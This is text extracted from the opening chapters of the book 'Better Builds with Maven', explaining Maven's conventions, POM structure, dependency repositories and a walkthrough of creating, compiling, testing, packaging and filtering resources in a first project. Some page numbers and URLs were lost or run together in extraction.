constantly searching to find all the different bits and pieces that make up a project. As a result you end up with a lack of shared knowledge.
or deploying. the notion that we should try to accommodate as many approaches as possible. makes it easier to communicate to others. and allows you to create value in your applications faster with less effort. Convention Over Configuration One of the central tenets of Maven is to provide sensible default strategies for the most common tasks. With Maven you slot the various pieces in where it asks and Maven will take care of almost all of the mundane aspects for you.2. you gain an immense reward in terms of productivity that allows you to do more. Rails does. which all add up to make a huge difference in daily use. This is not to say that you can't override Maven's defaults. One characteristic of opinionated software is the notion of 'convention over configuration'. The class automatically knows which table to use for persistence. but the use of sensible default strategies is highly encouraged.”2 David Heinemeier Hansson articulates very well what Maven has aimed to accomplish since its inception (note that David Heinemeier Hansson in no way endorses the use of Maven. Well. and I believe that's why it works. you're rewarded by not having to configure that link. that we shouldn't pass judgment on one form of development over another.Better Builds with Maven 1. sooner. All of these things should simply work. 2 O'Reilly interview with DHH 26 . If you follow basic conventions. he probably doesn't even know what Maven is and wouldn't like it if he did because it's not written in Ruby yet!): that is that you shouldn't need to spend a lot of time getting your development infrastructure functioning Using standard conventions saves time. generating documentation. One of those ideals is flexibility. such as classes are singular and tables are plural (a person class relates to a people table). you trade flexibility at the infrastructure level to gain flexibility at the application level. You don’t want to spend time fiddling with building.. so stray from these defaults when absolutely necessary only. and better at the application level. It eschews placing the old ideals of software in a primary position. so that you don't have to think about the mundane details. and this is what Maven provides. If you are happy to work along the golden path that I've embedded in Rails. With Rails.1. We have a ton of examples like that.
One Primary Output Per Project The second convention used by Maven is the concept that a single Maven project produces only one primary output. and a project for the shared utility code portion. separate projects: a project for the client portion of the application. In this scenario. the code contained in each project has a different concern (role to play) and they should be separated. Maven pushes you to think clearly about the separation of concerns when setting up your projects because modularity leads to reuse. but. If you have placed all the sources together in a single project. but you can also take a look in Appendix B for a full listing of the standard conventions. server code. You will be able to look at other projects and immediately understand the project layout. extendibility and reusability.consider a set of sources for a client/server-based application that contains client code. It is a very simple idea but it can save you a lot of time. when you do this. The separation of concerns (SoC) principle states that a given problem involves different kinds of concerns. makes it much easier to reuse. the boundaries between our three separate concerns can easily become blurred and the ability to reuse the utility code could prove to be difficult. you need to ask yourself if the extra configuration that comes with customization is really worth it. To illustrate. and documentation. If you do have a choice then why not harness the collective knowledge that has built up as a result of using this convention? You will see clear examples of the standard directory structure in the next chapter. These components are generally referred to as project content. maintainability. First time users often complain about Maven forcing you to do things a certain way and the formalization of the directory structure is the source of most of the complaints. you will be able to navigate within any Maven project you build in the future. project resources. Follow the standard directory layout. Having the utility code in a separate project (a separate JAR file).Introducing Maven Standard Directory Layout for Projects The first convention used by Maven is a standard directory layout for project sources. default locations. In this case. even if you only look at a few new projects a year that's time better spent on your application. but Maven would encourage you to have three. you will be able to adapt your project to your customized layout at a cost. which should be identified and separated to cope with complexity and to achieve the required engineering quality factors such as adaptability. increased complexity of your project's POM. If this saves you 30 minutes for each new project you look at. Maven encourages a common arrangement of project content so that once you are familiar with these standard. and you will make it easier to communicate about your project. You can override any of Maven's defaults to create a directory layout of your choosing. 27 . If you have no choice in the matter due to organizational policy or integration issues with existing systems. and shared utility code. You could produce a single JAR file which includes all the compiled classes. you might be forced to use a directory structure that diverges from Maven's defaults. configuration files. generated output. a project for the server portion of the application.
It is the POM that drives execution in Maven and this approach can be described as model-driven or declarative execution. It's happened to all of us.2 of Commons Logging. The intent behind the standard naming conventions employed by Maven is that it lets you understand exactly what you are looking at by.the POM is Maven's currency. Maven can be thought of as a framework that coordinates the execution of plugins in a well defined way. because the naming convention keeps each one separate in a logical. but with Maven. is the use of a standard naming convention for directories and for the primary output of each project. well. The naming conventions provide clarity and immediate comprehension. Even from this short list of examples you can see that a plugin in Maven has a very specific role to play in the grand scheme of things. Reuse of Build Logic As you have already learned. you would not even be able to get the information from the jar's manifest. The execution of Maven's plugins is coordinated by Maven's build life cycle in a declarative fashion with instructions from Maven's POM. and many other functions. a plugin for creating Javadocs. which results because the wrong version of a JAR file was used. a plugin for creating JARs.2. in a lot of cases. Maven is useless .2.jar. easily comprehensible manner. and the POM is Maven's description of a single project. It is immediately obvious that this is version 1. Systems that cannot cope with information rich artifacts like commons-logging-1. It doesn't make much sense to exclude pertinent information when you can have it at hand to use. when something is misplaced. Declarative Execution Everything in Maven is driven in a declarative fashion using Maven's Project Object Model (POM) and specifically. the plugin configurations contained in the POM. Moreover. a set of conventions really. you'll track it down to a ClassNotFound exception. Maven's project object model (POM) Maven is project-centric by design. 28 . A simple example of a standard naming convention might be commons-logging-1. later in this chapter.2. This is important if there are multiple subprojects involved in a build process. One important concept to keep in mind is that everything accomplished in Maven is the result of a plugin executing. Maven puts this SoC principle into practice by encapsulating build logic into coherent modules called plugins. looking at it.Better Builds with Maven Standard Naming Conventions The third convention in Maven. This is illustrated in the Coherent Organization of Dependencies section. If the JAR were named commonslogging. and it doesn't have to happen again.2. 1. In Maven there is a plugin for compiling source code.jar you would not really have any idea of the version of Commons Logging. Maven promotes reuse by encouraging a separation of concerns . a plugin for running tests. Without the POM.jar are inherently flawed because eventually. Plugins are the key building blocks for everything in Maven.
maven. The answer lies in Maven's implicit use of its Super POM.app</groupId> <artifactId>my-app</artifactId> <packaging>jar</packaging> <version>1.This element indicates the unique identifier of the organization or group that created the project. For example org.lang. The POM is an XML document and looks like the following (very) simplified example: <project> <modelVersion>4. The key feature to remember is the Super POM contains important default information so you don't have to repeat this information in the POMs you create.Object.apache. In Java.Introducing Maven The POM below is an example of what you could use to build and test a project.xml files. myapp-1. • groupId . Maven's Super POM carries with it all the default conventions that Maven encourages.<extension> (for example. You.0</modelVersion> <groupId>com. The POM contains every important piece of information about your project. Likewise.0-SNAPSHOT</version> <dependencies> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>3.lang.1</version> <scope>test</scope> </dependency> </dependencies> </project> This POM will allow you to compile.This element indicates the unique base name of the primary artifact being generated by this project.This required element indicates the version of the object model that the POM is using. Additional artifacts such as source bundles also use the artifactId as part of their file name.0.0.mycompany. but still displays the key elements that every POM contains.Object class. • • project . will ask “How this is possible using a 15 line file?”. The groupId is one of the key identifiers of a project and is typically based on the fully qualified domain name of your organization.jar). and is the analog of the Java language's java.8. so if you wish to find out more about it you can refer to Appendix B. The version of the model itself changes very infrequently. being the observant reader. but it is mandatory in order to ensure stability when Maven introduces new features or other model changes. in Maven all POMs have an implicit parent in Maven's Super POM. and generate basic documentation. 29 . The Super POM can be rather intimidating at first glance. The POM shown previously is a very simple POM.This is the top-level element in all Maven pom. modelVersion .plugins is the designated groupId for all Maven plugins. A typical artifact produced by Maven would have the form <artifactId>-<version>. • artifactId . all objects have the implicit parent of java. test.
or other projects that use it as a dependency. Maven plugins provide reusable build logic that can be slotted into the standard build life cycle. The default value for the packaging element is jar so you do not have to specify this in most cases. or test. generate-sources.This element indicates where the project's site can be found. which indicates that a project is in a state of development. So. if you tell Maven to compile. For a complete reference of the elements available for use in the POM please refer to the POM reference at element indicates the version of the artifact generated by the project. In Maven.apache.This element indicates the package type to be used by this artifact (JAR. testing. or package. For example. etc. For example. installation. • • url . packaging. Any time you need to customize the way your project builds you either use an existing plugin. EAR. For now. and during the build process for your project. process-sources.html. Maven goes a long way to help you with version management and you will often see the SNAPSHOT designator in a version. well-trodden build paths: preparation. The standard build life cycle consists of many phases and these can be thought of as extension points. related to that phase. WAR. This not only means that the artifact produced is a JAR. or create a custom plugin for the task at hand.This element provides a basic description of your project. just keep in mind that the selected packaging of a project plays a part in customizing the build life cycle. This is often used in Maven's generated documentation. but also indicates a specific life cycle to use as part of the build process. or goals. The actions that have to be performed are stated at a high level.7 Using Maven Plugins and Chapter 5 Developing Custom Maven Plugins for examples and details on how to customize the Maven build. It is important to note that each phase in the life cycle will be executed up to and including the phase you specify. When you need to add some functionality to the build life cycle you do so with a plugin. The path that Maven moves along to accommodate an infinite variety of projects is called the build life cycle. or install. description .). or EAR. and Maven deals with the details behind the scenes. See Chapter 2. Maven's Build Life Cycle Software projects generally follow similar.This element indicates the display name used for the project.Better Builds with Maven • packaging .org/maven-model/maven. WAR. and compile phases that precede it automatically. etc. compilation. In Maven you do day-to-day work by invoking particular phases in this standard build life cycle. initialize. version . the compile phase invokes a certain set of goals to compile a set of classes. generate-resources. The life cycle is a topic dealt with later in this chapter. • • name . the build life cycle consists of a series of phases where each phase can perform one or more actions. you tell Maven that you want to compile. Maven will execute the validate. 30 .
Maven tries to satisfy that dependency by looking in all of the remote repositories to which it has access. we can describe the process of dependency management as Maven reaching out into the world.app</groupId> <artifactId>my-app</artifactId> <packaging>jar</packaging> <version>1.3. artifactId and version. or EAR file.1</version> <scope>test</scope> </dependency> </dependencies> </project> This POM states that your project has a dependency on JUnit. In Java. If you recall. In the POM you are not specifically telling Maven where the dependencies are physically located. instead you deal with logical dependencies.8.mycompany. but you may be asking yourself “Where does that dependency come from?” and “Where is the JAR?” The answers to those questions are not readily apparent without some explanation of how Maven's dependencies.8. which is straightforward. grabbing a dependency. you are simply telling Maven what a specific project expects. SAR. artifacts and repositories work. A dependency is uniquely identified by the following identifiers: groupId. There is more going on behind the scenes. in order to find the artifacts that most closely match the dependency request. In “Maven-speak” an artifact is a specific piece of software. but a Java artifact could also be a WAR. instead it depends on version 3. Your project doesn't require junit-3.1 of the junit artifact produced by the junit group.8. but the key concept is that Maven dependencies are declarative. you stop focusing on a collection of JAR files. and it supplies these coordinates to its own internal dependency mechanisms. With Maven. Coherent Organization of Dependencies We are now going to delve into how Maven resolves dependencies and discuss the intimately connected concepts of dependencies. A dependency is a reference to a specific artifact that resides in a repository. Dependency Management is one of the most powerful features in Maven. In order for Maven to attempt to satisfy a dependency.0-SNAPSHOT</version> <dependencies> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>3. artifacts. 31 . At a basic level. and providing this dependency to your software project. When a dependency is declared within the context of your project. Maven needs to know what repository to search as well as the dependency's coordinates.0. the most common artifact is a JAR file.0</modelVersion> <groupId>com.1.2.jar. Maven takes the dependency coordinates you provide in the POM.Introducing Maven 1. and repositories. If a matching artifact is located. Maven transports it from that remote repository to your local repository for project use. our example POM has a single dependency listed for Junit: <project> <modelVersion>4.
You must have a local repository in order for Maven to work. By default. The following folder structure shows the layout of a local Maven repository that has a few locally installed dependency artifacts such as junit-3. Maven creates your local repository in ~/. but when a declared dependency is not present in your local repository Maven searches all the remote repositories to which it has access to find what’s missing.Better Builds with Maven Maven has two types of repositories: local and remote. it will create your local repository and populate it with artifacts as a result of dependency requests.jar: 32 .m2/repository. Local Maven repository When you install and run Maven for the first time.8. Read the following sections for specific details regarding where Maven searches for these dependencies. Maven usually interacts with your local repository.1.
. Above you can see the directory structure that is created when the JUnit dependency is resolved.Introducing Maven Figure 1-1: Artifact movement from remote to local repository So you understand how the layout works. a repository is just an abstract storage mechanism. In theory. On the next page is the general pattern used to create the repository layout: 33 .1.jar artifact that are now in your local repository.8. We’ll stick with our JUnit example and examine the junit-3. but in practice the repository is a directory structure in your file system. take a closer look at one of the artifacts that appeared in your local repository.
8.m2/repository/junit/junit/3.8.1” in ~/. 34 . artifactId of “junit”. Maven will generate a path to the artifact in your local repository.apache.Better Builds with Maven Figure 1-2: General pattern for the repository layout If the groupId is a fully qualified domain name (something Maven encourages) such as z. Locating dependency artifacts When satisfying dependencies.maven. If this file is not present. Maven will attempt to find the artifact with a groupId of “junit”.y.1/junit-3. and a version of “3.1. Maven will fetch it from a remote repository.8.jar.x then you will end up with a directory structure like the following: Figure 1-3: Sample directory structure In the first directory listing you can see that Maven artifacts are stored in a directory structure that corresponds to Maven’s groupId of org. for example. Maven attempts to locate a dependency's artifact using the following process: first.
if your project has ten web applications. Like the engine in your car or the processor in your laptop. To summarize. artifacts can be downloaded from a secure.1.com/. you don't have to jump through hoops trying to get it to work. which can be managed by Mergere Maestro. you simply change some configurations in Maven. rather than imposing it. 3 Alternatively. all projects referencing this dependency share a single copy of this JAR. Before Maven. If you were coding a web application.6 of the Spring Framework. it doesn't scale easily to support an application with a great number of small components. Maven will attempt to fetch an artifact from the central Maven repository at. simplifies the process of development. modular project arrangements. While this approach works for a few projects. 1. active open-source community that produces software focused on project management.3. Your local repository is one-stop-shopping for all artifacts that you need regardless of how many projects you are building. internal Maven repository.3 If your project's POM contains more than one remote repository. Maven provides such a technology for project management. Maven is a set of standards. Maestro is an Apache License 2. From this point forward.Introducing Maven By default. You don't have to worry about whether or not it's going to work. In other words.0 JARs to every project.mergere. into a lib directory. be a part of your thought process. every project with a POM that references the same dependency will use this single copy installed in your local repository. Storing artifacts in your SCM along with your project may seem appealing.ibiblio. it should rarely. and you would add these dependencies to your classpath. if ever. Maven is a framework. and they shouldn't be versioned in an SCM. Each project relies upon a specific artifact via the dependencies listed in a POM. Once the dependency is satisfied.jar for each project that needs it. Maven will attempt to download an artifact from each remote repository in the order defined in your POM. shielding you from complexity and allowing you to focus on your specific task.8. Declare your dependencies and let Maven take care of details like compilation and testing classpaths. which all depend on version 1. For more information on Maestro please see:. Using Maven is more than just downloading another JAR file and a set of scripts. in the background.2. the common pattern in most projects was to store JAR files in a project's subdirectory. 35 . Maven's Benefits A successful technology takes away burden.0 distribution based on a pre-integrated Maven. Maven is a repository. you don’t store a copy of junit3. it is the adoption of a build life-cycle process that allows you to take your software development to the next level. a useful technology just works. Instead of adding the Spring 2.org/maven2. you would check the 10-20 JAR files. Maven is also a vibrant. there is no need to store the various spring JAR files in your project. the artifact is downloaded and installed in your local repository. With Maven. but it is incompatible with the concept of small. upon which your project relies. Dependencies are not your project's code. and Maven is software.0 by changing your dependency declarations. in doing so. and. Continuum and Archiva build platform. and it is a trivial process to upgrade all ten web applications to Spring 2.
36 .Better Builds with Maven This page left intentionally blank.
The terrible temptation to tweak should be resisted unless the payoff is really noticeable.Jon Bentley and Doug McIlroy 37 .
it is assumed that you are a first time Maven user and have already set up Maven on your local system. then please refer to Maven's Download and Installation Instructions before continuing. then you should be all set to create your first Maven project. so for now simply assume that the above settings will work.com/maven2</url> <mirrorOf>central</mirrorOf> </mirror> </mirrors> </settings> In its optimal mode. Now you can perform the following basic check to ensure Maven is working correctly: mvn -version If Maven's version is displayed.xml file with the following content. If you are behind a firewall. then note the URL and let Maven know you will be using a proxy. ask your administrator if there if there is an internal Maven proxy.xml file.1.m2/settings.mycompany. The settings. If you have not set up Maven yet.Better Builds with Maven 2.m2/settings.com</id> <name>My Company's Maven Proxy</name> <url> file will be explained in more detail in the following chapter and you can refer to the Maven Web site for the complete details on the settings. Depending on where your machine is located. it may be necessary to make a few more preparations for Maven to function correctly.mycompany.com</host> <port>8080</port> <username>your-username</username> <password>your-password</password> </proxy> </proxies> </settings> If Maven is already in use at your workplace.xml file with the following content: <settings> <proxies> <proxy> <active>true</active> <protocol>http</protocol> <host>proxy. create a <your-homedirectory>/. To do this. 38 . Maven requires network access. Create a <your-home-directory>/. If there is an active Maven proxy running. Preparing to Use Maven In this chapter. <settings> <mirrors> <mirror> <id>maven. then you will have to set up Maven to understand that.
This chapter will show you how the archetype mechanism works.app</groupId> <artifactId>my-app</artifactId> <packaging>jar</packaging> <version>1.mycompany.8. After the archetype generation has completed. execute the following: C:\mvnbook> mvn archetype:create -DgroupId=com. and that it in fact adheres to Maven's standard directory layout discussed in Chapter 1.1</version> <scope>test</scope> </dependency> </dependencies> </project> At the top level of every project is your pom.xml file. you will notice that the following directory structure has been created. please refer to the Introduction to Archetypes. you will notice that a directory named my-app has been created for the new project. To create the Quick Start Maven project.xml.0</modelVersion> <groupId>com.0. In Maven.app \ -DartifactId=my-app You will notice a few things happened when you executed this command. 39 . you know you are dealing with a Maven project. Creating Your First Maven Project To create your first project.Getting Started with Maven 2. An archetype is defined as an original pattern or model from which all other things of the same kind are made. Whenever you see a directory structure. which looks like the following: <project> <modelVersion>4.org</url> <dependencies> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>3. First. which is combined with some user input to produce a fullyfunctional Maven project. you will use Maven's Archetype mechanism.2. an archetype is a template of a project. but if you would like more information about archetypes. which contains a pom.xml file. and this directory contains your pom.mycompany.apache.0-SNAPSHOT</version> <name>Maven Quick Start Archetype</name> <url>.
but the following analysis of the simple compile command shows you the four principles in action and makes clear their fundamental importance in simplifying the development of a project. compile your application sources using the following command: C:\mvnbook\my-app> mvn compile 40 . you are ready to build your project. in order to accomplish the desired task. Change to the <my-app> directory. testing. Compiling Application Sources As mentioned in the introduction. In this first stage you have Java source files only. in one fell swoop.3. you tell Maven what you need. at a very high level. Before you issue the command to compile the application sources. in a declarative way. Now that you have a POM. the site. some application sources. Then. and so on). and deploying the project (source files.Better Builds with Maven Figure 2-1: Directory structure after archetype generation The src directory contains all of the inputs required for building. note that this one simple command encompasses Maven's four foundational principles: • Convention over configuration • Reuse of build logic • Declarative execution • Coherent organization of dependencies These principles are ingrained in all aspects of Maven. and some test sources. but later in the chapter you will see how the standard directory layout is employed for other project content. documenting. various descriptors such as assembly descriptors. configuration files. The <my-app> directory is the base directory. for the my-app project. ${basedir}. 2.
in the first place? You might be guessing that there is some background process that maps a simple command to a particular plugin. [INFO] artifact org.maven. Instead. The next question. The same build logic encapsulated in the compiler plugin will be executed consistently across any number of projects. 41 . In fact. and how Maven invokes the compiler plugin.. inherited from the Super POM. Even the simplest of POMs knows the default location for application sources.plugins:maven-compiler-plugin: checking for updates from central . how was Maven able to decide to use the compiler plugin. in fact. [INFO] [resources:resources] .apache. What actually compiled the application sources? This is where Maven's second principle of “reusable build logic” comes into play. You can. along with its default configuration. application sources are placed in src/main/java. So. By default. is the tool used to compile your application sources. This means you don't have to state this location at all in any of your POMs. is target/classes.plugins:maven-resources-plugin: checking for updates from central .. of course. Although you now know that the compiler plugin was used to compile the application sources.. This default value (though not visible in the POM above) was. if you poke around the standard Maven installation. but there is very little reason to do so.apache. Maven downloads plugins as they are needed. what Maven uses to compile the application sources.Getting Started with Maven After executing this command you should see output similar to the following: [INFO-------------------------------------------------------------------[INFO] Building Maven Quick Start Archetype [INFO] task-segment: [compile] [INFO]------------------------------------------------------------------[INFO] artifact org.. override this default location. The standard compiler plugin. you won't find the compiler plugin since it is not shipped with the Maven distribution. now you know how Maven finds application sources.maven. there is a form of mapping and it is called Maven's default build life cycle.. how was Maven able to retrieve the compiler plugin? After all. The same holds true for the location of the compiled classes which. if you use the default location for application sources. How did Maven know where to look for sources in order to compile them? And how did Maven know where to put the compiled classes? This is where Maven's principle of “convention over configuration” comes into play. by default..
0 distribution based on a pre-integrated Maven. For more information on Maestro please see:. From a clean installation of Maven this can take quite a while (in the output above. 42 .Better Builds with Maven The first time you execute this (or any other) command. it took almost 4 minutes with a broadband connection). Maven will download all the plugins and related dependencies it needs to fulfill the command. This implies that all prerequisite phases in the life cycle will be performed to ensure that testing will be successful. you probably have unit tests that you want to compile and execute as well (after all. or where your output should go. it won't download anything new. Again.4 The next time you execute the same command again. Therefore. and eliminates the requirement for you to explicitly tell Maven where any of your sources are. Compiling Test Sources and Running Unit Tests Now that you're successfully compiling your application's sources. which is specified by the standard directory layout.4. Use the following simple command to test: C:\mvnbook\my-app> mvn test 4 Alternatively. Maestro is an Apache License 2. internal Maven repository. artifacts can be downloaded from a secure. programmers always write and execute their own unit tests *nudge nudge. If you're a keen observer you'll notice that using the standard conventions makes the POM above very small. because Maven already has what it needs. simply tell Maven you want to test your sources. As you can see from the output.com/. which can be managed by Mergere Maestro. the compiled classes were placed in target/classes. Maven will execute the command much quicker.mergere. wink wink*). Continuum and Archiva build platform. By following the standard Maven conventions you can get a lot done with very little effort! 2.
.all classes are up to date [INFO] [resources:testResources] [INFO] [compiler:testCompile] Compiling 1 source file to C:\Test\Maven2\test\my-app\target\test-classes . remember that it isn't necessary to run this every time.apache.. and execute the tests. Failures: 0.app. 43 ..mycompany. Time elapsed: 0 sec Results : [surefire] Tests run: 1. Failures: 0. since we haven't changed anything since we compiled last).maven.AppTest [surefire] Tests run: 1. Errors: 0 [INFO]------------------------------------------------------------------[INFO] BUILD SUCCESSFUL [INFO]------------------------------------------------------------------[INFO] Total time: 15 seconds [INFO] Finished at: Thu Oct 06 08:12:17 MDT 2005 [INFO] Final Memory: 2M/8M [INFO]------------------------------------------------------------------- Some things to notice about the output: • Maven downloads more dependencies this time. [INFO] [resources:resources] [INFO] [compiler:compile] [INFO] Nothing to compile . as well as all the others defined before it. compile the tests. If you simply want to compile your test sources (but not execute the tests). • Before compiling and executing the tests.. Now that you can compile the application sources. Errors: 0.plugins:maven-surefire-plugin: checking for updates from central .Getting Started with Maven After executing this command you should see output similar to the following: [INFO]------------------------------------------------------------------[INFO] Building Maven Quick Start Archetype [INFO] task-segment: [test] [INFO]------------------------------------------------------------------[INFO] artifact org. Maven compiles the main code (all these classes are up-to-date. [INFO] [surefire:test] [INFO] Setting reports dir: C:\Test\Maven2\test\my-app\target/surefire-reports ------------------------------------------------------T E S T S ------------------------------------------------------[surefire] Running com. mvn test will always run the compile and test-compile phases first. These are the dependencies and plugins necessary for executing the tests (recall that it already has the dependencies it needs for compiling and won't download them again). how to package your application. you'll want to move on to the next logical step. you can execute the following command: C:\mvnbook\my-app> mvn test-compile However.
Time elapsed: 0.0-SNAPSHOT.0-SNAPSHOT\my-app-1. This is how Maven knows to produce a JAR file from the above command (you'll read more about this later).Better Builds with Maven 2.0-SNAPSHOT. Errors: 0 [INFO] [jar:jar] [INFO] Building jar: <dir>/my-app/target/my-app-1. Failures: 0.m2/repository is the default location of the repository. The directory <your-homedirectory>/.jar to <localrepository>\com\mycompany\app\my-app\1. you'll want to install the artifact (the JAR file) you've generated into your local repository. Packaging and Installation to Your Local Repository Making a JAR file is straightforward and can be accomplished by executing the following command: C:\mvnbook\my-app> mvn package If you take a look at the POM for your project. To install. Take a look in the the target directory and you will see the generated JAR file. Errors: 0. Failures: 0.001 sec Results : [surefire] Tests run: 1.5.app. Now. It can then be used by other projects as a dependency.0-SNAPSHOT.jar [INFO] [install:install] [INFO] Installing c:\mvnbook\my-app\target\my-app-1.jar [INFO]------------------------------------------------------------------[INFO] BUILD SUCCESSFUL [INFO]------------------------------------------------------------------[INFO] Total time: 5 seconds [INFO] Finished at: Tue Oct 04 13:20:32 GMT-05:00 2005 [INFO] Final Memory: 3M/8M [INFO]------------------------------------------------------------------- 44 .mycompany. you will notice the packaging element is set to jar.
and if you've noticed. there are a great number of Maven plugins that work out-of-the-box. This chapter will cover one in particular. it will update the settings rather than starting fresh.java You have now completed the process for setting up. building. you must keep making error-prone additions. simply execute the following command: C:\mvnbook\my-app> mvn site There are plenty of other stand-alone goals that can be executed as well. as it is one of the highly-prized features in Maven. So. there is far more functionality available to you from Maven without requiring any additions to the POM. so it is fresh. to get any more functionality out of an Ant build script.java • **/*TestCase. Perhaps you'd like to generate an IntelliJ IDEA descriptor for the project: C:\mvnbook\my-app> mvn idea:idea This can be run over the top of a previous IDEA project. everything done up to this point has been driven by an 18-line POM. alternatively you might like to generate an Eclipse descriptor: C:\mvnbook\my-app> mvn eclipse:eclipse 45 .java Conversely. and installing a typical Maven project. this POM has enough information to generate a Web site for your project! Though you will typically want to customize your Maven site.java **/Test*. the following tests are included: • • **/*Test. what other functionality can you leverage. In this case. as it currently stands. for example: C:\mvnbook\my-app> mvn clean This will remove the target directory with the old build data before starting. Or. For projects that are built with Maven.Getting Started with Maven Note that the Surefire plugin (which executes the test) looks for tests contained in files with a particular naming convention. Of course. packaging. given Maven's re-usable build logic? With even the simplest POM. Without any work on your part.java **/Abstract*TestCase. In contrast. By default. testing. this covers the majority of tasks users perform. if you're pressed for time and just need to create a basic Web site for your project. the following tests are excluded: • • **/Abstract*Test.
starting at the base of the JAR. you need to add the directory src/main/resources. In the following example. Figure 2-2: Directory structure after adding the resources directory You can see in the preceding example that there is a META-INF directory with an application. you can package resources within JARs. For this common task. The rule employed by Maven is that all directories or files placed within the src/main/resources directory are packaged in your JAR with the exact same structure. simply by placing those resources in a standard directory structure. If you unpacked the JAR that Maven created you would see the following: 46 .Better Builds with Maven 2. which requires no changes to the POM shown previously. This means that by adopting Maven's standard conventions. is the packaging of resources into a JAR file. Maven again uses the standard directory layout.6.properties file within that directory. Handling Classpath Resources Another common use case. That is where you place any resources you wish to package in the JAR.
MF. simply create the resources and META-INF directories and create an empty file called application. You can create your own manifest if you choose. One simple use might be to retrieve the version of your application. If you would like to try this example.Getting Started with Maven Figure 2-3: Directory structure of the JAR file created by Maven The original contents of src/main/resources can be found starting at the base of the JAR and the application. The pom. as well as a pom. should the need arise. Operating on the POM file would require you to use Maven utilities. 47 .properties file.xml and pom.xml and pom.properties files are packaged up in the JAR so that each artifact produced by Maven is self-describing and also allows you to utilize the metadata in your own application. but Maven will generate one by default if you don't. These come standard with the creation of a JAR in Maven.properties file is there in the META-INF directory. but the properties can be utilized using the standard Java APIs. Then run mvn install and examine the jar file in the target directory. You will also notice some other files like META-INF/MANIFEST.xml inside.
. At this point you have a project directory structure that should look like the following: Figure 2-4: Directory structure after adding test resources In a unit test. except place resources in the src/test/resources directory.1.getResourceAsStream( "/test.. follow the same pattern as you do for adding resources to the JAR.. // Do something with the resource [.. Handling Test Classpath Resources To add resources to the classpath for your unit tests.] // Retrieve resource InputStream is = getClass().Better Builds with Maven 2.properties" ). you could use a simple snippet of code like the following for access to the resource required for testing: [.] 48 .6.
2. To accomplish this in Maven.plugins</groupId> <artifactId>maven-jar-plugin</artifactId> <configuration> <archive> <manifestFile>META-INF/MANIFEST. you can use the follow configuration for the maven-jarplugin: <plugin> <groupId>org. Filtering Classpath Resources Sometimes a resource file will need to contain a value that can be supplied at build time only.1</version> <scope>test</scope> </dependency> </dependencies> <build> <resources> <resource> <directory>src/main/resources</directory> <filtering>true</filtering> </resource> </resources> </build> </project> 49 . a property defined in an external properties file.6.xml. you can filter your resource files dynamically by putting a reference to the property that will contain the value into your resource file using the syntax ${<property name>}. or a system property.org</url> <dependencies> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>3.0.Getting Started with Maven To override the manifest file yourself.xml.0</modelVersion> <groupId>com.maven.mycompany.8.apache.apache. To have Maven filter resources when copying. The property can be either one of the values defined in your pom.app</groupId> <artifactId>my-app</artifactId> <packaging>jar</packaging> <version>1. simply set filtering to true for the resource directory in your pom.MF</manifestFile> </archive> </configuration> </plugin> 2. a value defined in the user's settings.xml: <project> <modelVersion>4.0-SNAPSHOT</version> <name>Maven Quick Start Archetype</name> <url>.
version=${project.xml. all you need to do is add a reference to this external file in your pom. and resource elements . add a reference to this new file in the pom. In fact. So ${project.] <build> <filters> <filter>src/main/filters/filter.xml file: [. when the built project is packaged. create an src/main/resources/application. First. you can execute the following command (process-resources is the build life cycle phase where the resources are copied and filtered): mvn process-resourcesThe application. resources. which weren't there before.properties my.build.properties: # filter.properties file. To reference a property defined in your pom.name=${project. which will eventually go into the JAR looks like this: # application.properties application. In addition.have been added.xml..value=hello! Next.] 50 .version} refers to the version of the project.properties application. the property name uses the names of the XML elements that define the value.. ${project. and ${project. To continue the example..name} application.xml to override the default value for filtering and set it to true. whose values will be supplied when the resource is filtered as follows: # application.0-SNAPSHOT To reference a property defined in an external file.finalName} refers to the final name of the file created.properties file under target/classes.filter.version} With that in place. the POM has to explicitly state that the resources are located in the src/main/resources directory.Better Builds with Maven You'll notice that the build. create an external properties file and call it src/main/filters/filter.properties</filter> </filters> <resources> <resource> <directory>src/main/resources</directory> <filtering>true</filtering> </resource> </resources> </build> [.which weren't there before .name} refers to the name of the project.version=1.name=Maven Quick Start Archetype application.. any element in your POM is available when filtering resources. All of this information was previously provided as default values and now must be added to the pom.
either the system properties built into Java (like java.version} message=${my.name} application.prop=hello again" 51 .value> </properties> </project> Filtering resources can also retrieve values from system properties.apache.properties file to look like the following: # application.Getting Started with Maven Then. the application.org</url> <dependencies> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>3.properties file as follows: # application.filter.prop=${command.filter.version=${project.line. you could have defined it in the properties section of your pom.line.filter.line.version} command.8.filter.app</groupId> <artifactId>my-app</artifactId> <packaging>jar</packaging> <version>1.1</version> <scope>test</scope> </dependency> </dependencies> <build> <resources> <resource> <directory>src/main/resources</directory> <filtering>true</filtering> </resource> </resources> </build> <properties> <my. when you execute the following command (note the definition of the command.value>hello</my.home). change the application. To continue the example.0-SNAPSHOT</version> <name>Maven Quick Start Archetype</name> <url>{project.0</modelVersion> <groupId>com.line.prop property on the command line).version or user.value} The next execution of the mvn process-resources command will put the new property value into application.properties.version=${java.properties application. mvn process-resources "-Dcommand.xml and you'd get the same effect (notice you don't need the references to src/main/filters/filter.properties file will contain the values from the system properties.prop} Now. or properties defined on the command line using the standard Java -D parameter. As an alternative to defining the my.value property in an external file.0. add a reference to this property in the application.properties java.mycompany.properties either):<project> <modelVersion>4.
6.. <build> <resources> <resource> <directory>src/main/resources</directory> <filtering>true</filtering> <excludes> <exclude>images/**</exclude> </excludes> </resource> <resource> <directory>src/main/resources</directory> <includes> <include>images/**</include> </includes> </resource> </resources> </build> . In addition you would add another resource entry. and an inclusion of your images directory. with filtering disabled. The build element would look like the following: <project> ..3. Preventing Filtering of Binary Resources Sometimes there are classpath resources that you want to include in your JAR..Better Builds with Maven 2. for example image files. then you would create a resource entry to handle the filtering of resources with an exclusion for the resources you wanted unfiltered. but you do not want them filtered. </project> 52 . This is most often the case with binary resources.. If you had a src/main/resources/images that you didn't want to be filtered.
